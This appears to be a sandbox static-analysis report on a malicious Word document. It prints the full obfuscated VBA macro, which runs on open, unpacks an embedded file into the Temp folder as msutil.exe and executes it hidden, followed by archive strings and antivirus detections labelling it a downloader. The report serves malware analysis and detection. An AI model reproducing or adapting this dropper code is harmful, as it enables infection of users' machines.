popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

Original

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoOpen()
TwcER
End Sub
Sub Workbook_Open()
TwcER
End Sub
Sub TwcER()
Dim FRFzHu As String
FRFzHu = Environ((Chr(84) & Chr(101) & Chr(109) & Chr(112))) & FRFzHu
gKqLs = Application.ActiveDocument.FullName
Set ftRnDsQ = CreateObject(Chr(119) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(99) & Chr(111) & Chr(112) & Chr(121) & Chr(32) & gKqLs & Chr(32) & FRFzHu & Chr(92) & Chr(49) & Chr(49) & Chr(49) & Chr(46) & Chr(122) & Chr(105) & Chr(112)
ftRnDsQ.Run YGHqQMR, 0, True
gKqLs = FRFzHu & Chr(92) & Chr(49) & Chr(49) & Chr(49) & Chr(46) & Chr(122) & Chr(105) & Chr(112)
TsKzjd = gKqLs
ETLoXC = FRFzHu
Set pHUNlQ = CreateObject("Shell.Application")
Set qaTmO = pHUNlQ.Namespace(TsKzjd).items
For Each URaElSt In qaTmO
If URaElSt.Name = Chr(67) & Chr(111) & Chr(110) & Chr(116) & Chr(101) & Chr(110) & Chr(116) & Chr(95) & Chr(68) & Chr(97) & Chr(116) & Chr(97) & Chr(115) & Chr(46) & Chr(120) & Chr(109) & Chr(108) Then
pHUNlQ.Namespace(ETLoXC).CopyHere URaElSt
End If
Next
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(109) & Chr(111) & Chr(118) & Chr(101) & Chr(32) & FRFzHu & Chr(92) & Chr(67) & Chr(111) & Chr(110) & Chr(116) & Chr(101) & Chr(110) & Chr(116) & Chr(95) & Chr(68) & Chr(97) & Chr(116) & Chr(97) & Chr(115) & Chr(46) & Chr(120) & Chr(109) & Chr(108) & Chr(32) & FRFzHu & Chr(92) & Chr(109) & Chr(115) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
ftRnDsQ.Run YGHqQMR, 0, True
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(100) & Chr(101) & Chr(108) & Chr(32) & Chr(45) & Chr(102) & Chr(32) & FRFzHu & Chr(92) & Chr(49) & Chr(49) & Chr(49) & Chr(46) & Chr(122) & Chr(105) & Chr(112)
ftRnDsQ.Run YGHqQMR, 0, True
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & FRFzHu & Chr(92) & Chr(109) & Chr(115) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
ftRnDsQ.Run YGHqQMR, 0, False

Selection.GoTo What:=wdGoToPage, Which:=wdGoToNext, Name:="3"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.Find.ClearFormatting
With Selection.Find
.Text = ""
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Font.Scaling = 100
Selection.Font.Size = 11
Selection.Font.ColorIndex = wdBlack
Selection.GoTo What:=wdGoToPage, Which:=wdGoToNext, Name:="2"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.Find.ClearFormatting
With Selection.Find
.Text = ""
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindAsk
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.GoTo What:=wdGoToPage, Which:=wdGoToNext, Name:="1"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.Find.ClearFormatting
With Selection.Find
.Text = ""
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "^p^p^p"
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
Selection.Delete Unit:=wdCharacter, Count:=1
With ActiveDocument
.UpdateStylesOnOpen = False
.AttachedTemplate = ""
End With
Dim oShp As Shape
Dim oILShp As InlineShape
targetHeight = 5
For Each oShp In ActiveDocument.Shapes
With oShp
.Width = AspectHt(.Height, .Width, CentimetersToPoints(5))
.Height = CentimetersToPoints(5)
End With
Next
For Each oILShp In ActiveDocument.InlineShapes
With oILShp
.Width = AspectHt(.Height, .Width, CentimetersToPoints(5))
.Height = CentimetersToPoints(5)
End With
Next
ActiveDocument.Save
End Sub
Private Function AspectHt(ByVal origWd As Long, ByVal origHt As Long, ByVal newWd As Long) As Long
If origWd <> 0 Then
AspectHt = (CSng(origHt) / CSng(origWd)) * newWd
Else
AspectHt = 0
End If
End Function

Deobfuscated

                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoOpen()
TwcER
End Sub
Sub Workbook_Open()
TwcER
End Sub
Sub TwcER()
Dim FRFzHu As String
FRFzHu = Environ((Chr(84) & Chr(101) & Chr(109) & Chr(112))) & FRFzHu
gKqLs = Application.ActiveDocument.FullName
Set ftRnDsQ = CreateObject(Chr(119) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108))
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(99) & Chr(111) & Chr(112) & Chr(121) & Chr(32) & gKqLs & Chr(32) & FRFzHu & Chr(92) & Chr(49) & Chr(49) & Chr(49) & Chr(46) & Chr(122) & Chr(105) & Chr(112)
ftRnDsQ.Run YGHqQMR, 0, True
gKqLs = FRFzHu & Chr(92) & Chr(49) & Chr(49) & Chr(49) & Chr(46) & Chr(122) & Chr(105) & Chr(112)
TsKzjd = gKqLs
ETLoXC = FRFzHu
Set pHUNlQ = CreateObject("Shell.Application")
Set qaTmO = pHUNlQ.Namespace(TsKzjd).items
For Each URaElSt In qaTmO
If URaElSt.Name = Chr(67) & Chr(111) & Chr(110) & Chr(116) & Chr(101) & Chr(110) & Chr(116) & Chr(95) & Chr(68) & Chr(97) & Chr(116) & Chr(97) & Chr(115) & Chr(46) & Chr(120) & Chr(109) & Chr(108) Then
pHUNlQ.Namespace(ETLoXC).CopyHere URaElSt
End If
Next
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(109) & Chr(111) & Chr(118) & Chr(101) & Chr(32) & FRFzHu & Chr(92) & Chr(67) & Chr(111) & Chr(110) & Chr(116) & Chr(101) & Chr(110) & Chr(116) & Chr(95) & Chr(68) & Chr(97) & Chr(116) & Chr(97) & Chr(115) & Chr(46) & Chr(120) & Chr(109) & Chr(108) & Chr(32) & FRFzHu & Chr(92) & Chr(109) & Chr(115) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
ftRnDsQ.Run YGHqQMR, 0, True
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & Chr(100) & Chr(101) & Chr(108) & Chr(32) & Chr(45) & Chr(102) & Chr(32) & FRFzHu & Chr(92) & Chr(49) & Chr(49) & Chr(49) & Chr(46) & Chr(122) & Chr(105) & Chr(112)
ftRnDsQ.Run YGHqQMR, 0, True
YGHqQMR = Chr(99) & Chr(109) & Chr(100) & Chr(32) & Chr(47) & Chr(99) & Chr(32) & FRFzHu & Chr(92) & Chr(109) & Chr(115) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
ftRnDsQ.Run YGHqQMR, 0, False

Selection.GoTo What:=wdGoToPage, Which:=wdGoToNext, Name:="3"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.Find.ClearFormatting
With Selection.Find
.Text = ""
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Font.Scaling = 100
Selection.Font.Size = 11
Selection.Font.ColorIndex = wdBlack
Selection.GoTo What:=wdGoToPage, Which:=wdGoToNext, Name:="2"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.Find.ClearFormatting
With Selection.Find
.Text = ""
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindAsk
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.GoTo What:=wdGoToPage, Which:=wdGoToNext, Name:="1"
Selection.GoTo What:=wdGoToBookmark, Name:="\page"
Selection.Find.ClearFormatting
With Selection.Find
.Text = ""
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "^p^p^p"
.Replacement.Text = ""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchByte = False
.CorrectHangulEndings = False
.HanjaPhoneticHangul = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
Selection.Delete Unit:=wdCharacter, Count:=1
With ActiveDocument
.UpdateStylesOnOpen = False
.AttachedTemplate = ""
End With
Dim oShp As Shape
Dim oILShp As InlineShape
targetHeight = 5
For Each oShp In ActiveDocument.Shapes
With oShp
.Width = AspectHt(.Height, .Width, CentimetersToPoints(5))
.Height = CentimetersToPoints(5)
End With
Next
For Each oILShp In ActiveDocument.InlineShapes
With oILShp
.Width = AspectHt(.Height, .Width, CentimetersToPoints(5))
.Height = CentimetersToPoints(5)
End With
Next
ActiveDocument.Save
End Sub
Private Function AspectHt(ByVal origWd As Long, ByVal origHt As Long, ByVal newWd As Long) As Long
If origWd <> 0 Then
AspectHt = (CSng(origHt) / CSng(origWd)) * newWd
Else
AspectHt = 0
End If
End Function
[Content_Types].xml
/L[E'9
_rels/.rels
word/_rels/document.xml.rels
X=c+(\
word/document.xml
KC/C,z
wS4++;
word/vbaProject.bin
x\gCC/
OIlH;o
Oi4}bBj
dRo,"tj
*rO4*)
wqvW?zySnv
i_mXh#
p;QXE1b
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/theme/theme1.xml
z(Ro=Tm
4-mhD,5
v*hM3XU
SH[%Heq
jv`fW~^
word/vbaData.xml
8|hG[+
D@}dMkdr{
word/settings.xml
\k(PS[
q[}>h#
docProps/app.xml
n<!=4|7
word/styles.xml
Ja|qpz
,kxm`1
:=daW
jfnnPY
Pzz1xa
;S?l~8
docProps/core.xml
0Y;xwu
=0nF":"
word/fontTable.xml
word/webSettings.xml
f\US}d
,y0|yh}
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/vbaProject.binPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic malicious (high confidence)
MicroWorld-eScan VB.Heur2.EmoDldr.5.D0822A91.Gen
FireEye VB.Heur2.EmoDldr.5.D0822A91.Gen
CAT-QuickHeal O97M.Dropper.AX
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-Macro.Save.521fff6b
Trustlook Clean
BitDefender VB.Heur2.EmoDldr.5.D0822A91.Gen
K7GW Clean
K7AntiVirus Clean
Baidu Clean
Cyren Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Mal_OLEMAL-3
Avast VBA:Downloader-ABM [Trj]
ClamAV Clean
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Trojan.Script.ExpKit.exylvw
SUPERAntiSpyware Clean
Rising Clean
Ad-Aware VB.Heur2.EmoDldr.5.D0822A91.Gen
Emsisoft VB.Heur2.EmoDldr.5.D0822A91.Gen (B)
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Mal_OLEMAL-3
McAfee-GW-Edition BehavesLike.Downloader.lc
CMC Clean
Sophos Clean
SentinelOne Static AI - Malicious OPENXML
GData VB.Heur2.EmoDldr.5.D0822A91.Gen
Jiangmin Clean
Avira Clean
MAX malware (ai score=82)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit HEUR.VBA.CG.1
ViRobot Clean
ZoneAlarm Clean
Avast-Mobile Clean
Cynet Clean
AhnLab-V3 VBA/Downloader.S78
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Probably Heur.W97Obfuscated
Tencent Heur.Macro.Generic.b.14da2c3e
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBA/Agent.MQC!tr.dldr
BitDefenderTheta Clean
AVG VBA:Downloader-ABM [Trj]
Panda Clean
No IRMA results available.